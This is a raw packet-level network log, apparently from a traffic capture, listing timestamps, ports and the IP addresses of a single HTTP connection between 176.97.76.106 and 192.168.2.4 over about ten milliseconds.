Apr 25, 2024 09:04:01.789940119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.789947033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.789949894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.789993048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.789994955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790005922 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790021896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790045977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790064096 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790091991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790105104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790150881 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790155888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790180922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790209055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790216923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790229082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790271044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790314913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790314913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790318012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790342093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790364981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790405989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790411949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790441990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790488005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790496111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790544987 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790553093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790565014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790594101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790612936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790628910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790677071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790704012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790718079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790762901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790769100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790795088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790807009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790867090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.790898085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790941954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.790981054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791017056 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791017056 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791021109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791034937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791105032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791110039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791151047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791197062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791229963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791280985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791328907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791348934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791380882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791511059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791518927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791594028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791609049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791620970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791635036 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791661024 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791681051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791698933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791713953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791726112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791740894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791780949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791795015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791801929 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791816950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791829109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791867018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791867018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791887999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791914940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791944981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.791965008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.791975975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792018890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792022943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792074919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792121887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792175055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792187929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792197943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792268991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792279005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792282104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792294025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792304993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792339087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792339087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792376041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792390108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792409897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792433023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792448997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792453051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792479038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792530060 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792550087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792565107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792577028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792608976 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792623043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792665005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792685986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792711020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792761087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792773008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792781115 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792829990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792853117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792864084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792877913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792890072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792913914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.792933941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.792933941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793001890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793014050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793062925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793071032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793073893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793086052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793103933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793128014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793133020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793144941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793168068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793184996 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793235064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793293953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793332100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793337107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793375015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793402910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793459892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793515921 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793534040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793579102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793590069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793631077 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793643951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793715954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793728113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793762922 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793766975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793798923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793833017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793881893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793917894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.793924093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.793936014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794006109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794008017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794017076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794055939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794064045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794110060 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794114113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794126987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794240952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794270039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794379950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794424057 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794455051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794467926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794492006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794502020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794517994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794558048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794624090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794636965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794676065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794677973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794691086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794713020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794744968 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794778109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794819117 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794836044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794882059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794922113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794934034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794953108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.794991970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.794994116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795046091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795084000 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795192003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795228004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795280933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795281887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795293093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795335054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795351982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795440912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795511007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795522928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795542002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795557022 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795562983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795574903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795614958 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795649052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795737028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795775890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795804977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795818090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795830011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795844078 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795857906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795869112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795897007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.795924902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795973063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.795991898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796020985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796036959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796080112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796103001 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796153069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796159983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796171904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796197891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796205044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796221972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796262026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796305895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796370983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796382904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796394110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796426058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796444893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796449900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796484947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796535969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796555996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796567917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796601057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796617031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796648026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796659946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796705008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796719074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796731949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796753883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796773911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796797037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796816111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796830893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796842098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796878099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796921968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796933889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796943903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.796988964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.796988964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797012091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797024012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797034979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797068119 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797154903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797166109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797177076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797189951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797211885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797223091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797234058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797250032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797264099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797286034 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797312975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797365904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797377110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797388077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797408104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797429085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797439098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797497988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797545910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797772884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797821999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797910929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797952890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.797972918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.797993898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798007965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798019886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798077106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798096895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798105955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798165083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798201084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798213959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798226118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798269033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798305035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798316956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798327923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798361063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798361063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798373938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798443079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798454046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798465967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798489094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798511982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798511982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798541069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798625946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798625946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798681974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798728943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798739910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798752069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798763037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798788071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798804998 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798818111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798830032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798841000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798904896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798916101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.798964977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798964977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.798998117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799009085 CEST	80	49733	176.97.76.106	192.168.2.4
